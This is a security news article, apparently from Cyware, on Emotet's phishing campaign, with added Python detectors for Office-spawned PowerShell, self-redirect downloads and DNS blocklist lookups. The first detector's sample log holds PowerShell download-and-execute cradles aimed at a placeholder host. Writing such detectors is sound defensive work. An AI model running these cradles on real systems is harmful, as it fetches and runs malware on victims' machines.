• The malware is distributed via phishing emails written in several languages, which the researchers say helps the campaign evade detection.
• Once installed, it connects to the attackers' C2 servers over a set of specific ports, including 20, 80, 443, 7080, 8443, and 50000.

The Emotet trojan has made a comeback in a new malspam campaign. Attackers are using phishing emails to distribute the malware, which is capable of stealing sensitive user data.

Modus Operandi

According to a report from Cisco Talos, the new campaign involves attackers sending victims phishing emails that carry a Microsoft Word attachment. The document contains malicious macros that act as a downloader for the malware.

When the malicious macro code runs, it invokes PowerShell, which connects to the Emotet distribution server and downloads the trojan onto the host system.
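The chain above (Word document, macro, PowerShell download cradle) leaves a distinctive trace in process-creation telemetry: an Office executable as the parent of a script host, usually with a download-and-execute command line. The detector below is an added example written for this article, not code from Cisco Talos or from the Emotet operators. The log format is a constructed, simplified rendering of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), the sample events are made up, and the hostnames are placeholders.

```python
"""Detect Office-launched script hosts with download-cradle command lines."""
import re
from dataclasses import dataclass

# Parents and children of interest (lower-case executable basenames).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Substrings typical of PowerShell download-and-execute cradles.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"
    r"|\biex\b|invoke-expression|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden"
    r"|frombase64string",
    re.IGNORECASE,
)


@dataclass
class Finding:
    parent: str
    child: str
    markers: list       # cradle markers seen in the command line (may be empty)
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Parse the constructed 'Key=Value|Key=Value' format used in SAMPLE_LOG.
    (Real command lines may contain '|'; a production parser would use the
    event's native structure instead of this delimiter.)"""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def analyze(line: str):
    """Return a Finding when an Office parent spawns a script host, else None."""
    ev = parse_event(line)
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = ev.get("CommandLine", "")
    markers = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmd)})
    return Finding(parent, child, markers, cmd)


def scan(lines):
    """Run analyze() over an iterable of log lines and keep the hits."""
    return [f for f in map(analyze, lines) if f is not None]


# Constructed sample events (not real telemetry). "SQBFAFgA" is the base64 of
# the UTF-16LE string "IEX", the form -EncodedCommand expects.
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=" + OFFICE + "WINWORD.EXE"
    "|CommandLine=WINWORD.EXE /n invoice.doc",
    "ParentImage=" + OFFICE + "WINWORD.EXE|Image=" + PS +
    "|CommandLine=powershell -w hidden -enc SQBFAFgA",
    "ParentImage=" + OFFICE + "WINWORD.EXE|Image=" + PS +
    "|CommandLine=powershell -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://compromised.example/wp-content/x.php')\"",
    "ParentImage=" + OFFICE + "WINWORD.EXE|Image=C:\\Windows\\splwow64.exe"
    "|CommandLine=splwow64.exe 12288",
    "ParentImage=" + OFFICE + "EXCEL.EXE|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd /c powershell -w hidden -nop -c \"iex (New-Object "
    "Net.WebClient).DownloadString('http://compromised.example/b.php')\"",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.parent} -> {hit.child} markers={hit.markers}")
```

The parent/child pairing is the high-confidence part of the rule; the cradle markers are there to rank hits and to survive obfuscation that hides the URL but not the `-enc` or `-w hidden` switches. Legitimate Office add-ins do occasionally spawn cmd.exe, so the `markers` list is what separates a page-one alert from a low-priority one.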

These phishing emails are sent to targeted victims in different languages, which the researchers say helps the campaign evade detection; a message written in the recipient's own language is also more convincing, so users are more likely to open the email and click on the malicious attachment.

“Once a user opens the email message and opens the attachment or clicks the link, malware is downloaded to the system using either code embedded in the attachment or directly from the website in the case of URL-based emails,” said researchers at Cisco Talos in a blog post.

Another change that the researchers observed was the use of HTTP 301 redirects.

Commenting on the URL-based delivery method, the researchers added that, “The malware is overwhelmingly hosted on compromised websites.”

“This initial HTTP request is met with a 301 pointing back to the same URL. This second request results in the malware being delivered and the header no longer includes the keep-alive. The reason for the 301 redirection and second request are currently unknown since browsing directly to the URL results in the malware being returned,” Cisco researchers explained.
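The sequence the researchers describe (a 301 whose Location is the very URL just requested, then a second request to that URL that returns the binary) is unusual enough to hunt for in web-proxy logs. The script below is an added example for this article, not code from Cisco Talos. It uses a constructed, whitespace-separated log format (timestamp, client, method, URL, status, Location, Content-Type) that is an assumption rather than any real proxy's output, and it keys on status, Location and Content-Type only; the keep-alive header difference the report mentions is not in this log format, so it is not checked here.

```python
"""Flag '301 back to the same URL, then a binary download' sequences in proxy logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Content types that usually mean an executable payload rather than a page.
PAYLOAD_TYPES = {"application/octet-stream", "application/x-msdownload",
                 "application/x-dosexec"}


def parse_line(line: str) -> dict:
    """Parse the constructed format:
    <ISO timestamp> <client> <method> <url> <status> <Location or -> <Content-Type or ->"""
    ts, client, method, url, status, location, ctype = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "method": method,
        "url": url,
        "status": int(status),
        "location": None if location == "-" else location,
        "ctype": None if ctype == "-" else ctype.split(";")[0].lower(),
    }


def find_self_redirect_downloads(lines, window=timedelta(seconds=30)):
    """Return one hit per (client, url) where a 301 whose Location equals the
    requested URL is followed, within `window`, by a 200 carrying a binary body."""
    events = sorted(map(parse_line, lines), key=lambda e: e["ts"])
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["client"], e["url"])].append(e)

    hits = []
    for (client, url), seq in by_key.items():
        for i, first in enumerate(seq):
            if first["status"] != 301 or first["location"] != url:
                continue
            for second in seq[i + 1:]:
                if second["ts"] - first["ts"] > window:
                    break
                if second["status"] == 200 and second["ctype"] in PAYLOAD_TYPES:
                    hits.append({"client": client, "url": url,
                                 "redirect_at": first["ts"],
                                 "download_at": second["ts"]})
                    break
    return hits


# Constructed log lines (made-up hosts and timestamps, not real traffic).
SAMPLE_LOG = [
    # The pattern from the report: 301 back to the same URL, then the payload.
    "2019-09-17T10:00:00 10.0.0.5 GET http://compromised.example/wp-content/x.php 301 http://compromised.example/wp-content/x.php -",
    "2019-09-17T10:00:01 10.0.0.5 GET http://compromised.example/wp-content/x.php 200 - application/octet-stream",
    # Ordinary HTTP-to-HTTPS redirect: Location differs, so it is not flagged.
    "2019-09-17T10:00:05 10.0.0.5 GET http://news.example/ 301 https://news.example/ -",
    "2019-09-17T10:00:06 10.0.0.5 GET https://news.example/ 200 - text/html",
    # Self-redirect that ends in a web page rather than a binary: not flagged.
    "2019-09-17T10:00:10 10.0.0.7 GET http://cms.example/index.php 301 http://cms.example/index.php -",
    "2019-09-17T10:00:11 10.0.0.7 GET http://cms.example/index.php 200 - text/html",
    # Binary download with no preceding self-redirect: not this rule's job.
    "2019-09-17T10:00:20 10.0.0.9 GET http://updates.example/setup.exe 200 - application/octet-stream",
]

if __name__ == "__main__":
    for hit in find_self_redirect_downloads(SAMPLE_LOG):
        print(hit)
```

Requiring a binary Content-Type on the second response keeps CMS installs that redirect to themselves (trailing-slash fixes, cookie checks) out of the results; if the payload is served as text/html or the proxy does not log Content-Type, widen `PAYLOAD_TYPES` or drop that condition and accept more triage work.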

Targeted ports

Once installed, Emotet connects to the attackers' C2 servers using specific ports, including 20, 80, 443, 7080, 8443, and 50000. Traffic on 80 and 443 blends in with ordinary web browsing, so the non-standard ports in that list are the easier ones to flag at the network edge.

The malware is under constant development. The researchers also observed it checking whether the victim's IP address is blacklisted or on a spam list maintained by services such as Spamhaus, SpamCop, or SORBS, a check that tells the operators whether the infected host is usable for sending spam.
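The blacklist check works over DNS: the host's IPv4 octets are reversed, appended to the service's blocklist zone and resolved; an A record in 127.0.0.0/8 means listed, NXDOMAIN means not listed. The script below reproduces that lookup so an analyst can recognise the DNS queries it generates. It is an added example for this article, not code from the Emotet authors or from Cisco Talos. The zone names are the services' public DNSBL zones; the resolver is injectable so the example runs offline against constructed answers (127.0.0.2 is Spamhaus's documented always-listed test address; the other fake answers are made up for the demo).

```python
"""Reproduce the DNSBL lookup a host performs to learn whether its IP is listed."""
import ipaddress
import socket

# Public DNS-based blocklist zones run by the three services named above.
DNSBL_ZONES = ("zen.spamhaus.org", "bl.spamcop.net", "dnsbl.sorbs.net")
LISTED_NET = ipaddress.IPv4Network("127.0.0.0/8")      # listing answers live here
ERROR_NET = ipaddress.IPv4Network("127.255.255.0/24")  # Spamhaus error codes


def dnsbl_name(ip: str, zone: str) -> str:
    """Build the query name: IPv4 octets reversed, then the zone."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")   # raises on bad/IPv6 input
    return ".".join(reversed(octets)) + "." + zone


def system_resolve(name: str):
    """A-record lookup via the OS resolver; None on NXDOMAIN or failure."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def check_listing(ip, zones=DNSBL_ZONES, resolve=system_resolve):
    """Query each zone. Per-zone result: None (not listed), the 127.x.y.z answer
    (listed), 'error:<addr>' for a DNSBL error code, or 'unexpected:<addr>' for
    a reply outside 127.0.0.0/8 (typically NXDOMAIN hijacking by a resolver)."""
    results = {}
    for zone in zones:
        answer = resolve(dnsbl_name(ip, zone))
        if answer is None:
            results[zone] = None
            continue
        addr = ipaddress.IPv4Address(answer)
        if addr in ERROR_NET:
            results[zone] = "error:" + answer
        elif addr in LISTED_NET:
            results[zone] = answer
        else:
            results[zone] = "unexpected:" + answer
    return results


def is_listed(results) -> bool:
    """True if any zone returned a genuine listing (a bare 127.x.y.z answer)."""
    return any(v is not None and ":" not in v for v in results.values())


# Constructed answers so the example runs offline. Only the 127.0.0.2 entries
# reflect documented behaviour; the SORBS and error replies are invented.
FAKE_DNS = {
    "2.0.0.127.zen.spamhaus.org": "127.0.0.2",
    "2.0.0.127.bl.spamcop.net": "127.0.0.2",
    "8.2.0.192.dnsbl.sorbs.net": "10.20.30.40",           # hijacked/odd reply
    "9.2.0.192.zen.spamhaus.org": "127.255.255.254",      # error code, not a listing
}

if __name__ == "__main__":
    for ip in ("127.0.0.2", "192.0.2.8", "192.0.2.9"):
        r = check_listing(ip, resolve=FAKE_DNS.get)
        print(ip, "listed" if is_listed(r) else "not listed", r)
```

Two practical notes. First, Spamhaus answers queries that arrive through large public resolvers with an error code instead of a listing, which is why the code refuses to count 127.255.255.0/24 as a hit; a production check needs a local resolver. Second, from the defender's side the query shape itself is the indicator: reversed-octet lookups under these zones from workstations, which have no business sending mail, stand out in DNS logs.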

Cyware Publisher